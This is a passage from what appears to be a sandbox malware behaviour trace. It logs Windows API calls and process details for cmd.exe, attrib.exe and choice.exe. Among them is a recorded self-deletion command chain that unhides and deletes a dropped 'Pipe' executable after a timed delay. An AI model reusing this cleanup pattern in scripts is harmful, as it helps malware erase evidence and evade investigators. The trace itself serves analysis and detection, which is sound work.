lpAttributeList=0x32f128) [0094.452] GetConsoleTitleW (in: lpConsoleTitle=0x32f4a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0094.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x210) returned 0x425418 [0094.453] GetProcessHeap () returned 0x410000 [0094.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x5e) returned 0x41f1f0 [0094.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x418) returned 0x425630 [0094.453] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x425638, lpFilePart=0x32efc8 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x32efc8*="system32") returned 0x13 [0094.453] SetErrorMode (uMode=0x1) returned 0x1 [0094.453] GetProcessHeap () returned 0x410000 [0094.453] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x425630, Size=0x3e) returned 0x425630 [0094.453] GetProcessHeap () returned 0x410000 [0094.453] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x425630) returned 0x3e [0094.453] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;") returned 0x64 [0094.453] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0094.453] GetProcessHeap () returned 0x410000 [0094.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xfe) returned 0x41f258 [0094.453] GetProcessHeap () returned 0x410000 [0094.453] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1f4) returned 0x425678 [0094.453] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x425678, Size=0x100) returned 0x425678 [0094.453] GetProcessHeap () returned 0x410000 [0094.453] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x425678) returned 0x100 [0094.454] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a300640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.454] GetProcessHeap () returned 0x410000 [0094.454] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xe0) returned 0x425780 [0094.454] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x425780, Size=0x76) returned 0x425780 [0094.454] GetProcessHeap () returned 0x410000 [0094.454] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x425780) returned 0x76 [0094.454] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0094.454] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x32ed44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed44) returned 0x425800 [0094.454] FindClose (in: hFindFile=0x425800 | out: hFindFile=0x425800) returned 1 [0094.454] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x32ed44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed44) returned 0xffffffff [0094.454] GetLastError () returned 0x2 [0094.455] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x32ed44, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed44) returned 0x425800 [0094.455] FindClose (in: hFindFile=0x425800 | out: hFindFile=0x425800) returned 1 [0094.455] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0094.455] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0094.455] GetConsoleTitleW (in: lpConsoleTitle=0x32f23c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0094.455] InitializeProcThreadAttributeList (in: lpAttributeList=0x32f0c4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x32f18c | out: lpAttributeList=0x32f0c4, lpSize=0x32f18c) returned 1 [0094.455] UpdateProcThreadAttribute (in: lpAttributeList=0x32f0c4, dwFlags=0x0, Attribute=0x60001, lpValue=0x32f184, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x32f0c4, lpPreviousValue=0x0) returned 1 [0094.455] GetStartupInfoW (in: lpStartupInfo=0x32f080 | out: lpStartupInfo=0x32f080*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0094.455] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x18) returned 0x425800 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0094.455] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0094.456] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0094.456] GetProcessHeap () returned 0x410000 [0094.456] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425800 | out: hHeap=0x410000) returned 1 [0094.456] GetProcessHeap () returned 0x410000 [0094.456] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa) returned 0x41fe30 [0094.456] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0094.456] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x32f120*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x32f16c | out: lpCommandLine="attrib -h \"C:\\Windows\\SysWOW64\\Pipe.exe\" ", lpProcessInformation=0x32f16c*(hProcess=0x7c, hThread=0x80, dwProcessId=0x640, dwThreadId=0x72c)) returned 1 [0094.472] CloseHandle (hObject=0x80) returned 1 [0094.472] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0094.472] GetProcessHeap () returned 0x410000 [0094.472] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428908 | out: hHeap=0x410000) returned 1 [0094.472] GetEnvironmentStringsW () returned 0x4220e8* [0094.472] GetProcessHeap () returned 0x410000 [0094.472] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa80) returned 0x428908 [0094.472] FreeEnvironmentStringsW (penv=0x4220e8) returned 1 [0094.472] WaitForSingleObject (hHandle=0x7c, dwMilliseconds=0xffffffff) returned 0x0 [0094.746] GetExitCodeProcess (in: hProcess=0x7c, lpExitCode=0x32f060 | out: lpExitCode=0x32f060*=0x0) returned 1 [0094.747] CloseHandle (hObject=0x7c) returned 1 [0094.747] _vsnwprintf (in: _Buffer=0x32f1a8, _BufferCount=0x13, _Format="%08X", _ArgList=0x32f06c | out: _Buffer="00000000") returned 8 [0094.747] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0094.747] GetProcessHeap () returned 0x410000 [0094.747] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428908 | out: hHeap=0x410000) returned 1 [0094.747] GetEnvironmentStringsW () returned 0x4220e8* [0094.747] GetProcessHeap () returned 0x410000 [0094.747] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa80) returned 0x428908 [0094.747] FreeEnvironmentStringsW (penv=0x4220e8) returned 1 [0094.747] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0094.747] GetProcessHeap () returned 0x410000 [0094.747] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x428908 | out: hHeap=0x410000) returned 1 [0094.747] GetEnvironmentStringsW () returned 0x4220e8* [0094.747] GetProcessHeap () returned 0x410000 [0094.747] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa80) returned 0x428908 [0094.747] FreeEnvironmentStringsW (penv=0x4220e8) returned 1 [0094.747] GetProcessHeap () returned 0x410000 [0094.747] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x41fe30 | out: hHeap=0x410000) returned 1 [0094.747] DeleteProcThreadAttributeList (in: lpAttributeList=0x32f0c4 | out: lpAttributeList=0x32f0c4) [0094.747] GetConsoleTitleW (in: lpConsoleTitle=0x32f4a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0094.748] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x88) returned 0x425800 [0094.748] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x425800, Size=0x48) returned 0x425800 [0094.748] GetProcessHeap () returned 0x410000 [0094.748] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x425800) returned 0x48 [0094.748] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x50) returned 0x425850 [0094.749] GetProcessHeap () returned 0x410000 [0094.749] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x88) returned 0x4258a8 [0094.749] RtlReAllocateHeap (Heap=0x410000, Flags=0x0, Ptr=0x4258a8, Size=0x48) returned 0x4258a8 [0094.749] GetProcessHeap () returned 0x410000 [0094.749] RtlSizeHeap (HeapHandle=0x410000, Flags=0x0, MemoryPointer=0x4258a8) returned 0x48 [0094.749] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x42) returned 0x4258f8 [0094.749] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x32f260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0094.749] GetProcessHeap () returned 0x410000 [0094.749] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x38) returned 0x425948 [0094.749] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x32e2f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0094.749] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x32e520, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x32e524, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x32e520*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0094.750] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0094.750] GetProcessHeap () returned 0x410000 [0094.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x2c) returned 0x425988 [0094.750] GetProcessHeap () returned 0x410000 [0094.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x258) returned 0x4259c0 [0094.750] _wcsicmp (_String1="Pipe.exe", _String2=".") returned 66 [0094.750] _wcsicmp (_String1="Pipe.exe", _String2="..") returned 66 [0094.750] GetFileAttributesW (lpFileName="C:\\Windows\\SysWOW64\\Pipe.exe" (normalized: "c:\\windows\\syswow64\\pipe.exe")) returned 0x20 [0094.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x210) returned 0x425c20 [0094.750] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x425c28 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0094.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\Pipe.exe", nBufferLength=0x104, lpBuffer=0x32e944, lpFilePart=0x32e92c | out: lpBuffer="C:\\Windows\\SysWOW64\\Pipe.exe", lpFilePart=0x32e92c*="Pipe.exe") returned 0x1c [0094.750] SetErrorMode (uMode=0x1) returned 0x1 [0094.750] GetFileAttributesW (lpFileName="C:\\Windows\\SysWOW64" (normalized: "c:\\windows\\syswow64")) returned 0x10 [0094.750] GetProcessHeap () returned 0x410000 [0094.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x258) returned 0x423fa8 [0094.750] _wcsicmp (_String1="Pipe.exe", _String2=".") returned 66 [0094.750] _wcsicmp (_String1="Pipe.exe", _String2="..") returned 66 [0094.750] GetFileAttributesW (lpFileName="C:\\Windows\\SysWOW64\\Pipe.exe" (normalized: "c:\\windows\\syswow64\\pipe.exe")) returned 0x20 [0094.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x1a) returned 0x410898 [0094.750] GetProcessHeap () returned 0x410000 [0094.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x425e38 [0094.750] GetProcessHeap () returned 0x410000 [0094.750] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x424208 [0094.751] GetProcessHeap () returned 0x410000 [0094.751] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x808) returned 0x4220e8 [0094.751] FindFirstFileExW (in: lpFileName="C:\\Windows\\SysWOW64\\Pipe.exe", fInfoLevelId=0x0, lpFindFileData=0x4220f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4220f4) returned 0x424240 [0094.751] DeleteFileW (lpFileName="C:\\Windows\\SysWOW64\\Pipe.exe" (normalized: "c:\\windows\\syswow64\\pipe.exe")) returned 1 [0094.751] FindNextFileW (in: hFindFile=0x424240, lpFindFileData=0x4220f4 | out: lpFindFileData=0x4220f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb12c000, ftCreationTime.dwHighDateTime=0x1d64ac6, ftLastAccessTime.dwLowDateTime=0xcb12c000, ftLastAccessTime.dwHighDateTime=0x1d64ac6, ftLastWriteTime.dwLowDateTime=0xcb12c000, ftLastWriteTime.dwHighDateTime=0x1d64ac6, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pipe.exe", cAlternateFileName="")) returned 0 [0094.753] GetLastError () returned 0x12 [0094.753] FindClose (in: hFindFile=0x424240 | out: hFindFile=0x424240) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4220e8 | out: hHeap=0x410000) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424208 | out: hHeap=0x410000) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x410898 | out: hHeap=0x410000) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425e38 | out: hHeap=0x410000) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x423fa8 | out: hHeap=0x410000) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425c20 | out: hHeap=0x410000) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4259c0 | out: hHeap=0x410000) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425988 | out: hHeap=0x410000) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425948 | out: hHeap=0x410000) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4258f8 | out: hHeap=0x410000) returned 1 [0094.753] GetProcessHeap () returned 0x410000 [0094.753] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4258a8 | out: hHeap=0x410000) returned 1 [0094.753] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.753] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.754] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.754] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2f41ac | out: lpMode=0x4a2f41ac) returned 1 [0094.754] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.754] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2f41b0 | out: lpMode=0x4a2f41b0) returned 1 [0094.754] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.754] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x187) returned 1 [0094.755] SetConsoleInputExeNameW () returned 0x1 [0094.755] GetConsoleOutputCP () returned 0x1b5 [0094.755] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0094.755] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.755] exit (_Code=0) Process: id = "25" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x3a64a000" os_pid = "0x980" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\sppsvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:00060f7a" [0xc000000f], "LOCAL" [0x7] Thread: id = 341 os_tid = 0x664 Thread: id = 342 os_tid = 0xbfc Thread: id = 344 os_tid = 0x688 Thread: id = 346 os_tid = 0x124 Thread: id = 365 os_tid = 0x648 Process: id = "26" image_name = "choice.exe" filename = "c:\\windows\\syswow64\\choice.exe" page_root = "0x3c3ab000" os_pid = "0x82c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x930" cmd_line = "choice /t 10 /d y " cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 343 os_tid = 0x85c Process: id = "27" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x39ef3000" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x6a8" cmd_line = "cmd /c choice /t 10 /d y & attrib -h \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\" & del \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Pipe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 348 os_tid = 0x490 [0083.948] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfaec | out: lpSystemTimeAsFileTime=0x2cfaec*(dwLowDateTime=0xd4879660, dwHighDateTime=0x1d64ac6)) [0083.948] GetCurrentProcessId () returned 0xac8 [0083.948] GetCurrentThreadId () returned 0x490 [0083.948] GetTickCount () returned 0x114ecee [0083.948] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfae4 | out: lpPerformanceCount=0x2cfae4*=20460514459) returned 1 [0083.950] GetModuleHandleA (lpModuleName=0x0) returned 0x4a2d0000 [0083.950] __set_app_type (_Type=0x1) [0083.950] __p__fmode () returned 0x770331f4 [0083.950] __p__commode () returned 0x770331fc [0083.950] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a2f21a6) returned 0x0 [0083.950] __getmainargs (in: _Argc=0x4a2f4238, _Argv=0x4a2f4240, _Env=0x4a2f423c, _DoWildCard=0, _StartInfo=0x4a2f4140 | out: _Argc=0x4a2f4238, _Argv=0x4a2f4240, _Env=0x4a2f423c) returned 0 [0083.950] GetCurrentThreadId () returned 0x490 [0083.950] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x490) returned 0x60 [0083.950] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0083.950] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0083.951] SetThreadUILanguage (LangId=0x0) returned 0x409 [0083.997] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0083.997] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa7c | out: phkResult=0x2cfa7c*=0x0) returned 0x2 [0083.997] VirtualQuery (in: lpAddress=0x2cfab3, lpBuffer=0x2cfa4c, dwLength=0x1c | out: lpBuffer=0x2cfa4c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0083.997] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa4c, dwLength=0x1c | out: lpBuffer=0x2cfa4c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0083.997] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa4c, dwLength=0x1c | out: lpBuffer=0x2cfa4c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0083.997] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa4c, dwLength=0x1c | out: lpBuffer=0x2cfa4c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0083.997] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa4c, dwLength=0x1c | out: lpBuffer=0x2cfa4c*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x110000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0083.997] GetConsoleOutputCP () returned 0x1b5 [0083.997] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a2f4260 | out: lpCPInfo=0x4a2f4260) returned 1 [0083.998] SetConsoleCtrlHandler (HandlerRoutine=0x4a2ee72a, Add=1) returned 1 [0083.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0083.998] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0083.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0083.998] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a2f41ac | out: lpMode=0x4a2f41ac) returned 1 [0083.998] _get_osfhandle (_FileHandle=1) returned 0x7 [0083.998] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0083.999] _get_osfhandle (_FileHandle=0) returned 0x3 [0083.999] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a2f41b0 | out: lpMode=0x4a2f41b0) returned 1 [0083.999] _get_osfhandle (_FileHandle=0) returned 0x3 [0083.999] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0083.999] GetEnvironmentStringsW () returned 0x622168* [0083.999] GetProcessHeap () returned 0x610000 [0083.999] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xaca) returned 0x622c40 [0084.000] FreeEnvironmentStringsW (penv=0x622168) returned 1 [0084.000] GetProcessHeap () returned 0x610000 [0084.000] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x621850 [0084.000] GetEnvironmentStringsW () returned 0x622168* [0084.000] GetProcessHeap () returned 0x610000 [0084.000] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xaca) returned 0x623718 [0084.000] FreeEnvironmentStringsW (penv=0x622168) returned 1 [0084.000] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce9ec | out: phkResult=0x2ce9ec*=0x68) returned 